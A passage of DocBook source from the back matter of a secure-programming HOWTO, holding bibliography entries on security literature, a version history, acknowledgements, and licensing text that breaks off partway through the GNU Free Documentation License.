July 18, 2000.
|
||
Best Practices for Secure Web Development.
|
||
<ulink url="http://members.home.net/razvan.peteanu">http://members.home.net/razvan.peteanu</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Pfleeger 1997]
|
||
Pfleeger, Charles P.
|
||
1997.
|
||
<emphasis remap="it">Security in Computing.</emphasis>
|
||
Upper Saddle River, NJ: Prentice-Hall PTR.
|
||
ISBN 0-13-337486-6.
|
||
</para>
|
||
|
||
<para>
|
||
[Phillips 1995]
|
||
Phillips, Paul.
|
||
September 3, 1995.
|
||
<emphasis remap="it">Safe CGI Programming</emphasis>.
|
||
<ulink
|
||
url="http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt">http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txt</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Quintero 1999]
|
||
Quintero, Federico Mena,
|
||
Miguel de Icaza, and Morten Welinder.
|
||
GNOME Programming Guidelines.
|
||
<ulink url="http://developer.gnome.org/doc/guides/programming-guidelines/book1.html">http://developer.gnome.org/doc/guides/programming-guidelines/book1.html</ulink>
|
||
<!-- http://developer.gnome.org/doc/guides/programming-guidelines/security.html -->
|
||
</para>
|
||
|
||
<para>
|
||
[Raymond 1997]
|
||
Raymond, Eric.
|
||
1997.
|
||
<emphasis remap="it">The Cathedral and the Bazaar</emphasis>.
|
||
<ulink
|
||
url="http://www.catb.org/~esr/writings/cathedral-bazaar">http://www.catb.org/~esr/writings/cathedral-bazaar</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Raymond 1998]
|
||
Raymond, Eric.
|
||
April 1998.
|
||
<emphasis remap="it">Homesteading the Noosphere</emphasis>.
|
||
<ulink
|
||
url="http://www.catb.org/~esr/writings/homesteading/homesteading.html">http://www.catb.org/~esr/writings/homesteading/homesteading.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Ranum 1998]
|
||
Ranum, Marcus J.
|
||
1998.
|
||
<emphasis remap="it">Security-critical coding for programmers -
|
||
a C and UNIX-centric full-day tutorial</emphasis>.
|
||
<ulink
|
||
url="http://www.clark.net/pub/mjr/pubs/pdf/">http://www.clark.net/pub/mjr/pubs/pdf/</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[RFC 822]
|
||
August 13, 1982.
|
||
<emphasis remap="it">Standard for the Format of ARPA Internet Text Messages</emphasis>.
|
||
IETF RFC 822.
|
||
<ulink
|
||
url="http://www.ietf.org/rfc/rfc0822.txt">http://www.ietf.org/rfc/rfc0822.txt</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[rfp 1999]
|
||
rain.forest.puppy.
|
||
1999.
|
||
``Perl CGI problems''.
|
||
<emphasis remap="it">Phrack Magazine</emphasis>.
|
||
Issue 55, Article 07.
|
||
<ulink
|
||
url="http://www.phrack.com/search.phtml?view&amp;article=p55-7">http://www.phrack.com/search.phtml?view&amp;article=p55-7</ulink> or
|
||
<ulink url="http://www.insecure.org/news/P55-07.txt">http://www.insecure.org/news/P55-07.txt</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Rijmen 2000]
|
||
Rijmen, Vincent.
|
||
"LinuxSecurity.com Speaks With AES Winner".
|
||
<ulink url="http://www.linuxsecurity.com/feature_stories/interview-aes-3.html">http://www.linuxsecurity.com/feature_stories/interview-aes-3.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Rochkind 1985]
|
||
Rochkind, Marc J.
|
||
<emphasis>Advanced Unix Programming</emphasis>.
|
||
Englewood Cliffs, NJ: Prentice-Hall, Inc.
|
||
ISBN 0-13-011818-4.
|
||
</para>
|
||
|
||
<para>
|
||
[Sahu 2002]
|
||
Sahu, Bijaya Nanda,
|
||
Srinivasan S. Muthuswamy,
|
||
Satya Nanaji Rao Mallampalli, and
|
||
Venkata R. Bonam.
|
||
July 2002.
|
||
``Is your Java code secure -- or exposed?
|
||
Build safer applications now to avoid trouble later''.
|
||
<ulink url="http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain">
|
||
http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain
|
||
</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[St. Laurent 2000]
|
||
St. Laurent, Simon.
|
||
February 2000.
|
||
<emphasis remap="it">XTech 2000 Conference Reports</emphasis>.
|
||
``When XML Gets Ugly''.
|
||
<ulink
|
||
url="http://www.xml.com/pub/2000/02/xtech/megginson.html">http://www.xml.com/pub/2000/02/xtech/megginson.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Saltzer 1974]
|
||
Saltzer, J.
|
||
July 1974.
|
||
``Protection and the Control of Information Sharing in MULTICS''.
|
||
<emphasis remap="it">Communications of the ACM</emphasis>.
|
||
v17 n7.
|
||
pp. 388-402.
|
||
</para>
|
||
|
||
<para>
|
||
[Saltzer 1975]
|
||
Saltzer, J., and M. Schroeder.
|
||
September 1975.
|
||
``The Protection of Information in Computing Systems''.
|
||
<emphasis remap="it">Proceedings of the IEEE</emphasis>.
|
||
v63 n9.
|
||
pp. 1278-1308.
|
||
<ulink
|
||
url="http://www.mediacity.com/~norm/CapTheory/ProtInf">http://www.mediacity.com/~norm/CapTheory/ProtInf</ulink>.
|
||
Summarized in [Pfleeger 1997, 286].
|
||
</para>
|
||
|
||
<para>
|
||
[Schneider 2000]
|
||
Schneider, Fred B.
|
||
2000.
|
||
"Open Source in Security: Visiting the Bizarre."
|
||
Proceedings of the 2000 IEEE Symposium on Security and Privacy
|
||
(the ``Oakland Conference''), May 14-17, 2000, Berkeley, CA.
|
||
Los Alamitos, CA: IEEE Computer Society.
|
||
pp. 126-127.
|
||
</para>
|
||
|
||
<para>
|
||
[Schneier 1996]
|
||
Schneier, Bruce.
|
||
1996.
|
||
<emphasis remap="it">Applied Cryptography, Second Edition:
|
||
Protocols, Algorithms, and Source Code in C</emphasis>.
|
||
New York: John Wiley and Sons.
|
||
ISBN 0-471-12845-7.
|
||
</para>
|
||
|
||
<para>
|
||
[Schneier 1998]
|
||
Schneier, Bruce and Mudge.
|
||
November 1998.
|
||
<emphasis remap="it">Cryptanalysis of Microsoft's Point-to-Point Tunneling Protocol (PPTP)</emphasis>.
|
||
Proceedings of the 5th ACM Conference on Communications and Computer Security,
|
||
ACM Press.
|
||
<ulink
|
||
url="http://www.counterpane.com/pptp.html">http://www.counterpane.com/pptp.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Schneier 1999]
|
||
Schneier, Bruce.
|
||
September 15, 1999.
|
||
``Open Source and Security''.
|
||
<emphasis remap="it">Crypto-Gram</emphasis>.
|
||
Counterpane Internet Security, Inc.
|
||
<ulink
|
||
url="http://www.counterpane.com/crypto-gram-9909.html">http://www.counterpane.com/crypto-gram-9909.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Seifried 1999]
|
||
Seifried, Kurt.
|
||
October 9, 1999.
|
||
<emphasis remap="it">Linux Administrator's Security Guide</emphasis>.
|
||
<ulink
|
||
url="http://www.securityportal.com/lasg">http://www.securityportal.com/lasg</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Seifried 2001]
|
||
Seifried, Kurt.
|
||
September 2, 2001.
|
||
WWW Authentication
|
||
<ulink url="http://www.seifried.org/security/www-auth/index.html">
|
||
http://www.seifried.org/security/www-auth/index.html</ulink>.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
[Shankland 2000]
|
||
Shankland, Stephen.
|
||
``Linux poses increasing threat to Windows 2000''.
|
||
CNET.
|
||
<ulink
|
||
url="http://news.cnet.com/news/0-1003-200-1549312.html">http://news.cnet.com/news/0-1003-200-1549312.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Shostack 1999]
|
||
Shostack, Adam.
|
||
June 1, 1999.
|
||
<emphasis remap="it">Security Code Review Guidelines</emphasis>.
|
||
<ulink
|
||
url="http://www.homeport.org/~adam/review.html">http://www.homeport.org/~adam/review.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Sibert 1996]
|
||
Sibert, W. Olin.
|
||
Malicious Data and Computer Security.
|
||
(NIST) NISSC '96.
|
||
<ulink url="http://www.fish.com/security/maldata.html">http://www.fish.com/security/maldata.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Sitaker 1999]
|
||
Sitaker, Kragen.
|
||
Feb 26, 1999.
|
||
<emphasis remap="it">How to Find Security Holes</emphasis>
|
||
<ulink
|
||
url="http://www.pobox.com/~kragen/security-holes.html">http://www.pobox.com/~kragen/security-holes.html</ulink> and
|
||
<ulink
|
||
url="http://www.dnaco.net/~kragen/security-holes.html">http://www.dnaco.net/~kragen/security-holes.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[SSE-CMM 1999]
|
||
SSE-CMM Project.
|
||
April 1999.
|
||
<emphasis remap="it">Systems Security Engineering Capability Maturity Model (SSE CMM)
|
||
Model Description Document</emphasis>.
|
||
Version 2.0.
|
||
<ulink
|
||
url="http://www.sse-cmm.org">http://www.sse-cmm.org</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Stallings 1996]
|
||
Stallings, William.
|
||
Practical Cryptography for Data Internetworks.
|
||
Los Alamitos, CA: IEEE Computer Society Press.
|
||
ISBN 0-8186-7140-8.
|
||
</para>
|
||
|
||
<para>
|
||
[Stein 1999]
|
||
Stein, Lincoln D.
|
||
September 13, 1999.
|
||
<emphasis remap="it">The World Wide Web Security FAQ</emphasis>.
|
||
Version 2.0.1
|
||
<ulink
|
||
url="http://www.w3.org/Security/Faq/www-security-faq.html">http://www.w3.org/Security/Faq/www-security-faq.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Swan 2001]
|
||
Swan, Daniel.
|
||
January 6, 2001.
|
||
comp.os.linux.security FAQ.
|
||
Version 1.0.
|
||
<ulink url="http://www.linuxsecurity.com/docs/colsfaq.html">http://www.linuxsecurity.com/docs/colsfaq.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Swanson 1996]
|
||
Swanson, Marianne, and Barbara Guttman.
|
||
September 1996.
|
||
Generally Accepted Principles and Practices for Securing
|
||
Information Technology Systems.
|
||
NIST Computer Security Special Publication (SP) 800-14.
|
||
<ulink url="http://csrc.nist.gov/publications/nistpubs/index.html">http://csrc.nist.gov/publications/nistpubs/index.html</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[Thompson 1974]
|
||
Thompson, K. and D.M. Ritchie.
|
||
July 1974.
|
||
``The UNIX Time-Sharing System''.
|
||
<emphasis remap="it">Communications of the ACM</emphasis>.
|
||
Vol. 17, No. 7.
|
||
pp. 365-375.
|
||
<!-- Revised and reprinted in Ritchie 1978a; see Bach 1986 -->
|
||
</para>
|
||
|
||
<para>
|
||
[Torvalds 1999]
|
||
Torvalds, Linus.
|
||
February 1999.
|
||
``The Story of the Linux Kernel''.
|
||
<emphasis remap="it">Open Sources: Voices from the Open Source Revolution</emphasis>.
|
||
Edited by Chris DiBona, Mark Stone, and Sam Ockman.
|
||
O'Reilly and Associates.
|
||
ISBN 1565925823.
|
||
<ulink
|
||
url="http://www.oreilly.com/catalog/opensources/book/linus.html">http://www.oreilly.com/catalog/opensources/book/linus.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[TruSecure 2001]
|
||
TruSecure.
|
||
August 2001.
|
||
Open Source Security: A Look at the Security Benefits of Source Code Access.
|
||
<ulink url="http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf">http://www.trusecure.com/html/tspub/whitepapers/open_source_security5.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Unknown]
|
||
<emphasis remap="it">SETUID(7)</emphasis>
|
||
<ulink
|
||
url="http://www.homeport.org/~adam/setuid.7.html">http://www.homeport.org/~adam/setuid.7.html</ulink>.
|
||
<!-- Claimed to be from Dan Farmer's COPS, but COPS does not include it. -->
|
||
</para>
|
||
|
||
<para>
|
||
[Van Biesbrouck 1996]
|
||
Van Biesbrouck, Michael.
|
||
April 19, 1996.
|
||
<ulink url="http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec">http://www.csclub.uwaterloo.ca/u/mlvanbie/cgisec</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
[van Oorschot 1994]
|
||
van Oorschot, P. and M. Wiener.
|
||
November 1994.
|
||
``Parallel Collision Search with Applications to Hash Functions
|
||
and Discrete Logarithms.''
|
||
Proceedings of ACM Conference on Computer and Communications Security.
|
||
</para>
|
||
|
||
<para>
|
||
[Venema 1996]
|
||
Venema, Wietse.
|
||
1996.
|
||
Murphy's law and computer security.
|
||
<ulink url="http://www.fish.com/security/murphy.html">http://www.fish.com/security/murphy.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Viega 2002]
|
||
Viega, John, and Gary McGraw.
|
||
2002.
|
||
Building Secure Software.
|
||
Addison-Wesley.
|
||
ISBN 0-201-72152-X.
|
||
</para>
|
||
|
||
<para>
|
||
[Watters 1996]
|
||
Watters, Aaron, Guido van Rossum, and James C. Ahlstrom.
|
||
1996.
|
||
Internet Programming with Python.
|
||
NY, NY: Henry Holt and Company, Inc.
|
||
</para>
|
||
|
||
<para>
|
||
[Wheeler 1996]
|
||
Wheeler, David A., Bill Brykczynski, and Reginald N. Meeson, Jr.
|
||
1996.
|
||
Software Inspection: An Industry Best Practice.
|
||
Los Alamitos, CA: IEEE Computer Society Press.
|
||
IEEE Computer Society Press Order Number BP07340.
|
||
Library of Congress Number 95-41054.
|
||
ISBN 0-8186-7340-0.
|
||
</para>
|
||
|
||
<para>
|
||
[Witten 2001]
|
||
Witten, Brian, Carl Landwehr, and Michael Caloyannides.
|
||
September/October 2001.
|
||
``Does Open Source Improve System Security?''
|
||
IEEE Software.
|
||
pp. 57-61.
|
||
<ulink url="http://www.computer.org/software">http://www.computer.org/software</ulink>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
[Wood 1985]
|
||
Wood, Patrick H. and Stephen G. Kochan.
|
||
1985.
|
||
<emphasis remap="it">Unix System Security</emphasis>.
|
||
Indianapolis, Indiana: Hayden Books.
|
||
ISBN 0-8104-6267-2.
|
||
</para>
|
||
|
||
<para>
|
||
[Wreski 1998]
|
||
Wreski, Dave.
|
||
August 22, 1998.
|
||
<emphasis remap="it">Linux Security Administrator's Guide</emphasis>.
|
||
Version 0.98.
|
||
<ulink
|
||
url="http://www.nic.com/~dave/SecurityAdminGuide/index.html">http://www.nic.com/~dave/SecurityAdminGuide/index.html</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Yoder 1998]
|
||
Yoder, Joseph and Jeffrey Barcalow.
|
||
1998.
|
||
Architectural Patterns for Enabling Application Security.
|
||
PLoP '97
|
||
<ulink url="http://st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf">
|
||
http://st-www.cs.uiuc.edu/~hanmer/PLoP-97/Proceedings/yoder.pdf</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Zalewski 2001]
|
||
Zalewski, Michael.
|
||
May 16-17, 2001.
|
||
Delivering Signals for Fun and Profit:
|
||
Understanding, exploiting and preventing signal-handling related
|
||
vulnerabilities.
|
||
Bindview Corporation.
|
||
<ulink url="http://razor.bindview.com/publish/papers/signals.txt">http://razor.bindview.com/publish/papers/signals.txt</ulink>
|
||
</para>
|
||
|
||
<para>
|
||
[Zoebelein 1999]
|
||
Zoebelein, Hans U.
|
||
April 1999.
|
||
The Internet Operating System Counter.
|
||
<ulink url="http://www.leb.net/hzo/ioscount">http://www.leb.net/hzo/ioscount</ulink>.
|
||
</para>
|
||
|
||
</chapter>
|
||
|
||
<appendix id="document-history">
|
||
<title>History</title>
|
||
<para>
|
||
Here are a few key events in the development of this book, starting
|
||
with the most recent:
|
||
|
||
<variablelist>
|
||
|
||
<varlistentry><term>
|
||
2002-10-29 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Version 3.000 released, adding a new section on determining
|
||
security requirements and a discussion of the Common Criteria,
|
||
broadening the document.
|
||
Many smaller improvements were incorporated as well.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
2001-01-01 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Version 2.70 released, adding a substantial amount of new material,
|
||
such as a significant expansion of the discussion of cross-site
|
||
malicious content, HTML/URI filtering, and handling temporary files.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
2000-05-24 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Switched to GNU's GFDL license, added more content.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
2000-04-21 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Version 2.00 released, dated 21 April 2000, which switched the
|
||
document's internal format from the Linuxdoc DTD to the DocBook DTD.
|
||
Thanks to Jorge Godoy for helping me perform the transition.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
|
||
<varlistentry><term>
|
||
2000-04-04 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Version 1.60 released;
|
||
changed so that it now covers <emphasis>both</emphasis> Linux and Unix.
|
||
Since most of the guidelines covered both, and many/most app developers want
|
||
their apps to run on both, it made sense to cover both.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
2000-02-09 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Noted that the document is now part of the Linux Documentation Project (LDP).
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
<varlistentry><term>
|
||
1999-11-29 David A. Wheeler
|
||
</term>
|
||
<listitem>
|
||
<para>
|
||
Initial version (1.0) completed and released to the public.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
|
||
</variablelist>
|
||
</para>
|
||
|
||
<para>
|
||
Note that a more detailed description of changes is available on-line
|
||
in the ``ChangeLog'' file.
|
||
</para>
|
||
</appendix>
|
||
|
||
<appendix id="acknowledgements">
|
||
<title>Acknowledgements</title>
|
||
|
||
<epigraph>
|
||
<attribution>Proverbs 27:17 (NIV)</attribution>
|
||
<para>
|
||
As iron sharpens iron, so one man sharpens another.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
My thanks to the following people who kept me honest by sending me emails
|
||
noting errors, suggesting areas to cover, asking questions, and so on.
|
||
Where email addresses are included, they've been
|
||
shrouded by prepending my ``thanks.'' so bulk emailers
|
||
won't easily get these addresses; inclusion of people in this list is
|
||
<emphasis>not</emphasis> an authorization to send
|
||
unsolicited bulk email to them.
|
||
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Neil Brown (thanks.neilb@cse.unsw.edu.au)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Martin Douda (thanks.mad@students.zcu.cz)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Jorge Godoy
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Scott Ingram (thanks.scott@silver.jhuapl.edu)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Michael Kerrisk
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Doug Kilpatrick
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
John Levon (levon@movementarian.org)
|
||
<!-- was John Levon (moz@compsoc.man.ac.uk) -->
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Ryan McCabe (thanks.odin@numb.org)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Paul Millar (thanks.paulm@astro.gla.ac.uk)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Chuck Phillips (thanks.cdp@peakpeak.com)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Martin Pool (thanks.mbp@humbug.org.au)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Eric S. Raymond (thanks.esr@snark.thyrsus.com)
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Marc Welz
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Eric Werme (thanks.werme@alpha.zk3.dec.com)
|
||
</para></listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
If you want to be on this list, please send me a constructive suggestion at
|
||
<ulink
|
||
url="mailto:dwheeler@dwheeler.com">dwheeler@dwheeler.com</ulink>.
|
||
If you send me a constructive suggestion, but do <emphasis remap="it">not</emphasis> want credit,
|
||
please let me know that when you send your suggestion, comment, or
|
||
criticism; normally I expect that people want credit, and I want to give
|
||
them that credit.
|
||
My current process is to add contributor names to this list in the document,
|
||
with more detailed explanation of their comment in the ChangeLog for
|
||
this document (available on-line).
|
||
Note that although these people have sent in ideas, the actual text is my own,
|
||
so don't blame them for any errors that may remain.
|
||
Instead, please send me another constructive suggestion.
|
||
</para>
|
||
|
||
</appendix>
|
||
|
||
<appendix id="about-license">
|
||
<title>About the Documentation License</title>
|
||
|
||
<epigraph>
|
||
<attribution>Esther 3:14 (NIV)</attribution>
|
||
<para>
|
||
A copy of the text of the edict was to be issued as law
|
||
in every province and made known to the people of every
|
||
nationality so they would be ready for that day.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
This document is Copyright (C) 1999-2000 David A. Wheeler.
|
||
Permission is granted to copy, distribute and/or modify
|
||
this document under the terms of the GNU Free Documentation License (FDL),
|
||
Version 1.1 or any later version published by the Free Software Foundation;
|
||
with the invariant sections being ``About the Author'',
|
||
with no Front-Cover Texts, and no Back-Cover Texts.
|
||
A copy of the license is included below in
|
||
<xref linkend="fdl">.
|
||
</para>
|
||
|
||
<para>
|
||
These terms do permit mirroring by other web sites,
|
||
but be <emphasis remap="it">sure</emphasis> to do the following:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
make sure your mirrors automatically get upgrades from the master site,
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
<para>
|
||
clearly show the location of the master site
|
||
(<ulink
|
||
url="http://www.dwheeler.com/secure-programs">http://www.dwheeler.com/secure-programs</ulink>), with a hypertext link
|
||
to the master site, and
|
||
</para>
|
||
</listitem>
|
||
|
||
<listitem>
|
||
<para>
|
||
give me (David A. Wheeler) credit as the author.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
The first two points primarily protect me from repeatedly hearing about
|
||
obsolete bugs.
|
||
I do not want to hear about bugs I fixed a year ago, just because you
|
||
are not properly mirroring the document.
|
||
By linking to the master site,
|
||
users can check and see if your mirror is up-to-date.
|
||
I'm sensitive to the problems of sites which have very
|
||
strong security requirements and therefore cannot risk normal
|
||
connections to the Internet; if that describes your situation,
|
||
at least try to meet the other points
|
||
and try to occasionally sneakernet updates into your environment.
|
||
</para>
|
||
|
||
<para>
|
||
By this license, you may modify the document,
|
||
but you can't claim that what you didn't write is yours (i.e., plagiarism)
|
||
nor can you pretend that a modified version is identical to
|
||
the original work.
|
||
Modifying the work does not transfer copyright of the entire work to you;
|
||
this is not a ``public domain'' work in terms of copyright law.
|
||
See the license in <xref linkend="fdl"> for details.
|
||
If you have questions about what the license allows, please contact me.
|
||
In most cases, it's better if you send your changes to the master
|
||
integrator (currently David A. Wheeler), so that your changes will be
|
||
integrated with everyone else's changes into the master copy.
|
||
</para>
|
||
|
||
<para>
|
||
I am not a lawyer; nevertheless, it's my position as an author
|
||
and software developer that any code fragments
|
||
not explicitly marked otherwise are so small that their use fits under
|
||
the ``fair use'' doctrine in copyright law.
|
||
In other words, unless marked otherwise, you can use the code fragments
|
||
without any restriction at all.
|
||
Copyright law does not permit copyrighting absurdly small components
|
||
of a work
|
||
(e.g., ``I own all rights to B-flat and B-flat minor chords''), and
|
||
the fragments not marked otherwise are of the same kind of minuscule
|
||
size when compared to real programs.
|
||
I've done my best to give credit for specific pieces of code
|
||
written by others.
|
||
Some of you may still be concerned about the legal status of this code,
|
||
and I want to make sure that it's clear
|
||
that you can use this code in your software.
|
||
Therefore, code fragments included directly in this document not otherwise
|
||
marked have also been released by me under the terms of the ``MIT license'',
|
||
to assure you that there's no serious legal encumbrance:
|
||
</para>
|
||
|
||
<programlisting width="66">
|
||
Source code in this book not otherwise identified is
|
||
Copyright (c) 1999-2001 David A. Wheeler.
|
||
|
||
Permission is hereby granted, free of charge, to any person
|
||
obtaining a copy of the source code in this book not
|
||
otherwise identified (the "Software"), to deal in the
|
||
Software without restriction, including without limitation
|
||
the rights to use, copy, modify, merge, publish, distribute,
|
||
sublicense, and/or sell copies of the Software, and to
|
||
permit persons to whom the Software is furnished to do so,
|
||
subject to the following conditions:
|
||
|
||
The above copyright notice and this permission notice shall be
|
||
included in all copies or substantial portions of the Software.
|
||
|
||
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
|
||
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
|
||
PURPOSE AND NONINFRINGEMENT.
|
||
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
|
||
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
|
||
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
|
||
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
|
||
</programlisting>
|
||
|
||
</appendix>
|
||
|
||
|
||
<!-- Previously it had label="A" -->
|
||
<appendix id="fdl">
|
||
<title>GNU Free Documentation License</title>
|
||
<para>
|
||
Version 1.1, March 2000
|
||
</para>
|
||
|
||
<para>
|
||
Copyright © 2000
|
||
<address>
|
||
Free Software Foundation, Inc.
|
||
<street>59 Temple Place, Suite 330</street>,
|
||
<city>Boston</city>,
|
||
<state>MA</state>
|
||
<postcode>02111-1307</postcode>
|
||
<country>USA</country>
|
||
</address>
|
||
Everyone is permitted to copy and distribute verbatim copies of this license
|
||
document, but changing it is not allowed.
|
||
</para>
|
||
|
||
<variablelist>
|
||
<varlistentry id="fdl-preamble">
|
||
<term>0. PREAMBLE</term>
|
||
<listitem>
|
||
<para>
|
||
The purpose of this License is to make a manual, textbook, or other
|
||
written document "free" in the sense of freedom: to assure everyone
|
||
the effective freedom to copy and redistribute it, with or without
|
||
modifying it, either commercially or noncommercially. Secondarily,
|
||
this License preserves for the author and publisher a way to get
|
||
credit for their work, while not being considered responsible for
|
||
modifications made by others.
|
||
</para>
|
||
|
||
<para>
|
||
This License is a kind of "copyleft", which means that derivative
|
||
works of the document must themselves be free in the same sense. It
|
||
complements the GNU General Public License, which is a copyleft
|
||
license designed for free software.
|
||
</para>
|
||
|
||
<para>
|
||
We have designed this License in order to use it for manuals for free
|
||
software, because free software needs free documentation: a free
|
||
program should come with manuals providing the same freedoms that the
|
||
software does. But this License is not limited to software manuals; it
|
||
can be used for any textual work, regardless of subject matter or
|
||
whether it is published as a printed book. We recommend this License
|
||
principally for works whose purpose is instruction or reference.
|
||
</para>
|
||
</listitem>
|
||
</varlistentry>
|
||
<varlistentry id="fdl-section1">
|
||
<term>1. APPLICABILITY AND DEFINITIONS</term>
|
||
<listitem>
|
||
<para id="fdl-document">
|
||
This License applies to any manual or other work that contains a
|
||
notice placed by the copyright holder saying it can be distributed
|
||
under the terms of this License. The <link
|
||
linkend="fdl-document">"Document" </link>, below, refers to any such
|
||
manual or work. Any member of the public is a licensee, and is
|
||
addressed as "you".
|
||
</para>
|
||
|
||
<para id="fdl-modified">
|
||
A <link linkend="fdl-modified">"Modified Version"</link> of the
|
||
Document means any work containing the Document or a portion of it,
|
||
either copied verbatim, or with modifications and/or translated into
|
||
another language.
|
||
</para>
|
||
|
||
<para id="fdl-secondary">
|
||
A <link linkend="fdl-secondary">"Secondary Section"</link> is a named
|
||
appendix or a front-matter section of the <link
|
||
linkend="fdl-document">Document</link> that deals exclusively with the
|
||
relationship of the publishers or authors of the <link
|
||
linkend="fdl-document"> Document</link> to the <link
|
||
linkend="fdl-document"> Document's</link> overall subject (or to
|
||
related matters) and contains nothing that could fall directly within
|
||
that overall subject. (For example, if the <link
|
||
linkend="fdl-document">Document</link> is in part a textbook of
|
||
mathematics, a <link linkend="fdl-secondary">Secondary Section</link>
|
||
may not explain any mathematics.) The relationship could be a matter
|
||
of historical connection with the subject or with related matters, or
|
||
of legal, commercial, philosophical, ethical or political position
|
||
regarding them.
|
||
</para>
|
||
|
||
<para id="fdl-invariant">
|
||
The <link linkend="fdl-invariant">"Invariant Sections"</link> are
|
||
certain <link linkend="fdl-secondary"> Secondary Sections</link> whose
|
||
titles are designated, as being those of <link
|
||
linkend="fdl-invariant">Invariant Sections</link>, in the notice that
|
||
says that the <link linkend="fdl-document">Document</link> is released
|
||
under this License.
|
||
</para>
|
||
|
||
<para id="fdl-cover-texts">
|
||
The <link linkend="fdl-cover-texts">"Cover Texts"</link> are certain
|
||
short passages of text that are listed, as <link
|
||
linkend="fdl-cover-texts">Front-Cover Texts</link> or <link
|
||
linkend="fdl-cover-texts">Back-Cover Texts</link>, in the notice that
|
||
says that the <link linkend="fdl-document">Document</link> is released
|
||
under this License.
|
||
</para>
|
||
|
||
<para id="fdl-transparent">
|
||
A <link linkend="fdl-transparent">"Transparent"</link> copy of the
|
||
<link linkend="fdl-document"> Document</link> means a machine-readable
|
||
copy, represented in a format whose specification is available to the
|
||
general public, whose contents can be viewed and edited directly and
|
||
straightforwardly with generic text editors or (for images composed of
|
||
pixels) generic paint programs or (for drawings) some widely available
|
||
